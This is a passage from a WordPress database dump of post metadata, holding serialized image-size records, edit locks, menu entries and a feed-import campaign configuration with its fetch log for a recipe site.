mbnail\";a:4:{s:4:\"file\";s:32:\"landing-footer-img21-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:32:\"landing-footer-img21-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(9724,4604,'_wp_attached_file','revslider/landing-slide2-graphic31.png'),(9725,4604,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:240;s:6:\"height\";i:205;s:4:\"file\";s:38:\"revslider/landing-slide2-graphic31.png\";s:5:\"sizes\";a:3:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:36:\"landing-slide2-graphic31-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"landing-slide2-graphic31-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:36:\"landing-slide2-graphic31-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(9726,4605,'_wp_attached_file','revslider/landing-slide2-graphic41.png'),(9727,4605,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:328;s:6:\"height\";i:339;s:4:\"file\";s:38:\"revslider/landing-slide2-graphic41.png\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:36:\"landing-slide2-graphic41-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:36:\"landing-slide2-graphic41-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"landing-slide2-graphic41-290x300.png\";s:5:\"width\";i:290;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"landing-slide2-graphic41-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:36:\"landing-slide2-graphic41-328x300.png\";s:5:\"width\";i:328;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:36:\"landing-slide2-graphic41-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:36:\"landing-slide2-graphic41-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:36:\"landing-slide2-graphic41-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(9728,4606,'_wp_attached_file','revslider/landing-slide1-graphic81.png'),(9729,4606,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:850;s:6:\"height\";i:150;s:4:\"file\";s:38:\"revslider/landing-slide1-graphic81.png\";s:5:\"sizes\";a:13:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:36:\"landing-slide1-graphic81-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:36:\"landing-slide1-graphic81-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:36:\"landing-slide1-graphic81-600x106.png\";s:5:\"width\";i:600;s:6:\"height\";i:106;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"landing-slide1-graphic81-300x53.png\";s:5:\"width\";i:300;s:6:\"height\";i:53;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"landing-slide1-graphic81-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:36:\"landing-slide1-graphic81-768x136.png\";s:5:\"width\";i:768;s:6:\"height\";i:136;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:36:\"landing-slide1-graphic81-630x150.png\";s:5:\"width\";i:630;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:36:\"landing-slide1-graphic81-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:36:\"landing-slide1-graphic81-550x150.png\";s:5:\"width\";i:550;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:36:\"landing-slide1-graphic81-550x150.png\";s:5:\"width\";i:550;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:36:\"landing-slide1-graphic81-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:36:\"landing-slide1-graphic81-600x106.png\";s:5:\"width\";i:600;s:6:\"height\";i:106;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:36:\"landing-slide1-graphic81-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(9730,4607,'_wp_attached_file','revslider/landing-slide2-graphic51.png'),(9731,4607,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:194;s:6:\"height\";i:183;s:4:\"file\";s:38:\"revslider/landing-slide2-graphic51.png\";s:5:\"sizes\";a:3:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:36:\"landing-slide2-graphic51-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"landing-slide2-graphic51-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:36:\"landing-slide2-graphic51-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(9732,4608,'_wp_attached_file','revslider/landing-slide2-graphic61.png'),(9733,4608,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:127;s:6:\"height\";i:77;s:4:\"file\";s:38:\"revslider/landing-slide2-graphic61.png\";s:5:\"sizes\";a:2:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:35:\"landing-slide2-graphic61-100x77.png\";s:5:\"width\";i:100;s:6:\"height\";i:77;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:35:\"landing-slide2-graphic61-100x77.png\";s:5:\"width\";i:100;s:6:\"height\";i:77;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(9734,4609,'_wp_attached_file','revslider/landing-slide2-graphic71.png'),(9735,4609,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:169;s:6:\"height\";i:146;s:4:\"file\";s:38:\"revslider/landing-slide2-graphic71.png\";s:5:\"sizes\";a:3:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:36:\"landing-slide2-graphic71-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"landing-slide2-graphic71-150x146.png\";s:5:\"width\";i:150;s:6:\"height\";i:146;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:36:\"landing-slide2-graphic71-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(9736,4610,'_wp_attached_file','revslider/landing-cimet-img-71.png'),(9737,4610,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:186;s:6:\"height\";i:394;s:4:\"file\";s:34:\"revslider/landing-cimet-img-71.png\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:32:\"landing-cimet-img-71-186x300.png\";s:5:\"width\";i:186;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"landing-cimet-img-71-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"landing-cimet-img-71-142x300.png\";s:5:\"width\";i:142;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"landing-cimet-img-71-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:32:\"landing-cimet-img-71-186x300.png\";s:5:\"width\";i:186;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:32:\"landing-cimet-img-71-186x240.png\";s:5:\"width\";i:186;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:32:\"landing-cimet-img-71-186x300.png\";s:5:\"width\";i:186;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:32:\"landing-cimet-img-71-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(9738,4611,'_wp_attached_file','revslider/nova-vocka1.png'),(9739,4611,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:400;s:6:\"height\";i:290;s:4:\"file\";s:25:\"revslider/nova-vocka1.png\";s:5:\"sizes\";a:7:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:23:\"nova-vocka1-300x290.png\";s:5:\"width\";i:300;s:6:\"height\";i:290;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:23:\"nova-vocka1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"nova-vocka1-300x218.png\";s:5:\"width\";i:300;s:6:\"height\";i:218;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"nova-vocka1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:23:\"nova-vocka1-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:23:\"nova-vocka1-300x290.png\";s:5:\"width\";i:300;s:6:\"height\";i:290;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:23:\"nova-vocka1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(9740,4612,'_wp_attached_file','revslider/recept-11.png'),(9741,4612,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:552;s:6:\"height\";i:657;s:4:\"file\";s:23:\"revslider/recept-11.png\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:21:\"recept-11-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"recept-11-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"recept-11-252x300.png\";s:5:\"width\";i:252;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"recept-11-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:21:\"recept-11-552x300.png\";s:5:\"width\";i:552;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:21:\"recept-11-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:21:\"recept-11-550x550.png\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:21:\"recept-11-552x550.png\";s:5:\"width\";i:552;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:21:\"recept-11-550x657.png\";s:5:\"width\";i:550;s:6:\"height\";i:657;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:21:\"recept-11-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"recept-11-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(9743,3218,'_edit_lock','1585741078:1'),(9747,1336,'_edit_lock','1585741731:1'),(9748,2651,'_edit_lock','1585741791:1'),(9749,2635,'_edit_lock','1585741829:1'),(9750,585,'_edit_lock','1585741996:1'),(9751,1767,'_edit_lock','1585745166:1'),(9752,1682,'_edit_lock','1585742413:1'),(9753,3776,'_edit_lock','1587684958:1'),(9754,347,'_edit_lock','1585743028:1'),(9766,4622,'_edit_last','1'),(9767,4622,'slide_template',''),(9768,4622,'rs_page_bg_color',''),(9769,4622,'postscount','10'),(9770,4622,'cronnextrun','1586216700'),(9771,4622,'lastrun','1586216509'),(9772,4622,'campaign_data','a:77:{s:2:\"ID\";i:4622;s:14:\"campaign_title\";s:7:\"RECIPES\";s:13:\"campaign_type\";s:4:\"feed\";s:17:\"campaign_posttype\";s:7:\"publish\";s:23:\"campaign_customposttype\";s:4:\"post\";s:20:\"campaign_post_format\";s:1:\"0\";s:9:\"activated\";b:1;s:24:\"campaign_feed_order_date\";b:1;s:17:\"campaign_feeddate\";b:0;s:14:\"campaign_feeds\";a:1:{i:0;s:42:\"https://www.tummyrevolution.com/blogs/news\";}s:4:\"cron\";s:9:\"* * * * *\";s:11:\"cronnextrun\";i:1586216700;s:13:\"mailerroronly\";b:0;s:14:\"mailaddresslog\";s:0:\"\";s:12:\"campaign_max\";i:2;s:15:\"campaign_author\";i:1;s:21:\"campaign_linktosource\";b:0;s:22:\"copy_permanlink_source\";b:1;s:24:\"avoid_search_redirection\";b:0;s:20:\"campaign_strip_links\";b:1;s:28:\"campaign_strip_links_options\";a:3:{s:1:\"a\";b:1;s:6:\"script\";b:0;s:6:\"iframe\";b:0;}s:22:\"campaign_commentstatus\";s:4:\"open\";s:19:\"campaign_allowpings\";b:0;s:19:\"campaign_woutfilter\";b:0;s:18:\"campaign_striphtml\";b:0;s:28:\"campaign_enable_convert_utf8\";b:0;s:25:\"campaign_no_setting_audio\";b:0;s:20:\"campaign_audio_cache\";b:0;s:21:\"campaign_attach_audio\";b:0;s:21:\"campaign_nolink_audio\";b:0;s:27:\"campaign_customupload_audio\";b:0;s:25:\"campaign_no_setting_video\";b:0;s:20:\"campaign_video_cache\";b:0;s:21:\"campaign_attach_video\";b:0;s:21:\"campaign_nolink_video\";b:0;s:27:\"campaign_customupload_video\";b:0;s:23:\"campaign_no_setting_img\";b:1;s:17:\"campaign_imgcache\";b:0;s:19:\"campaign_attach_img\";b:0;s:18:\"campaign_nolinkimg\";b:0;s:21:\"campaign_image_srcset\";b:0;s:20:\"campaign_featuredimg\";b:1;s:39:\"campaign_enable_featured_image_selector\";b:1;s:32:\"campaign_featured_selector_index\";s:1:\"0\";s:31:\"campaign_featured_selector_ifno\";s:5:\"first\";s:22:\"campaign_rmfeaturedimg\";b:0;s:21:\"campaign_customupload\";b:0;s:24:\"campaign_enable_template\";b:0;s:17:\"campaign_template\";s:0:\"\";s:10:\"postscount\";i:10;s:14:\"lastpostscount\";i:0;s:7:\"lastrun\";i:1586216509;s:11:\"lastruntime\";i:1;s:9:\"starttime\";s:0:\"\";s:13:\"campaign_tags\";s:0:\"\";s:17:\"campaign_autocats\";b:0;s:24:\"campaign_parent_autocats\";i:-1;s:19:\"campaign_categories\";a:1:{i:0;s:2:\"92\";}s:16:\"campaign_wrd2cat\";a:5:{s:4:\"word\";a:1:{i:0;s:0:\"\";}s:5:\"title\";a:1:{i:0;b:0;}s:5:\"regex\";a:1:{i:0;b:0;}s:8:\"w2ccateg\";a:1:{i:0;i:0;}s:5:\"cases\";a:1:{i:0;b:0;}}s:32:\"campaign_w2c_only_use_a_category\";b:0;s:35:\"campaign_w2c_the_category_most_used\";b:0;s:17:\"campaign_rewrites\";a:5:{s:6:\"origin\";a:1:{i:0;s:0:\"\";}s:5:\"title\";a:1:{i:0;b:0;}s:5:\"regex\";a:1:{i:0;b:0;}s:7:\"rewrite\";a:1:{i:0;s:0:\"\";}s:6:\"relink\";a:1:{i:0;s:0:\"\";}}s:26:\"campaign_youtube_ign_image\";b:0;s:36:\"campaign_youtube_image_only_featured\";b:0;s:32:\"campaign_youtube_ign_description\";b:0;s:29:\"campaign_no_setting_duplicate\";b:0;s:24:\"campaign_allowduplicates\";b:0;s:22:\"campaign_allowduptitle\";b:0;s:21:\"campaign_allowduphash\";b:0;s:36:\"campaign_add_ext_duplicate_filter_ms\";b:0;s:23:\"campaign_jumpduplicates\";b:0;s:22:\"campaign_bbpress_forum\";i:0;s:22:\"campaign_bbpress_topic\";i:0;s:21:\"campaign_xml_feed_url\";s:0:\"\";s:17:\"campaign_xml_node\";a:0:{}s:24:\"campaign_xml_node_parent\";a:0:{}s:42:\"https://www.tummyrevolution.com/blogs/news\";a:1:{s:8:\"lasthash\";s:0:\"\";}}'),(9773,4622,'_edit_lock','1586042355:1'),(9779,4622,'_lasthash_httpswww.tummyrevolution.comblogsnews','572d60be6ddddfc0a4f77ec9b76953e9'),(9825,4622,'last_campaign_log','2020-04-06 23:41.49: Trying to set ignore_user_abort = On: Success - Old value:1.
\n2020-04-06 23:41.49: Trying to set max_execution_time = 300: Success - Old value:300.
\n2020-04-06 23:41.49: Processing feed https://www.tummyrevolution.com/blogs/news.
\n2020-04-06 23:41.50: Found duplicated hash \'https://www.tummyrevolution.com/blogs/news/banana-bread-muffins\': 572d60be6ddddfc0a4f77ec9b76953e9
\n2020-04-06 23:41.50: Filtering duplicated posts.
\n2020-04-06 23:41.50: Campaign fetched in 1 sec.
\n'),(9835,4634,'_menu_item_type','taxonomy'),(9836,4634,'_menu_item_menu_item_parent','0'),(9837,4634,'_menu_item_object_id','20'),(9838,4634,'_menu_item_object','category'),(9839,4634,'_menu_item_target',''),(9840,4634,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9841,4634,'_menu_item_xfn',''),(9842,4634,'_menu_item_url',''),(9937,4652,'_edit_lock','1586770032:1'),(9938,4653,'_wp_attached_file','2020/04/banana_bread6_2048x2048.jpg'),(9939,4653,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1365;s:6:\"height\";i:2048;s:4:\"file\";s:35:\"2020/04/banana_bread6_2048x2048.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:35:\"banana_bread6_2048x2048-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:35:\"banana_bread6_2048x2048-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:35:\"banana_bread6_2048x2048-600x900.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:900;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"banana_bread6_2048x2048-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:36:\"banana_bread6_2048x2048-683x1024.jpg\";s:5:\"width\";i:683;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"banana_bread6_2048x2048-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:36:\"banana_bread6_2048x2048-768x1152.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:35:\"banana_bread6_2048x2048-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:35:\"banana_bread6_2048x2048-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:37:\"banana_bread6_2048x2048-1024x1536.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:35:\"banana_bread6_2048x2048-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:36:\"banana_bread6_2048x2048-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:36:\"banana_bread6_2048x2048-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:37:\"banana_bread6_2048x2048-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:35:\"banana_bread6_2048x2048-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:35:\"banana_bread6_2048x2048-600x900.jpg\";s:5:\"width\";i:600;s:6:\"hei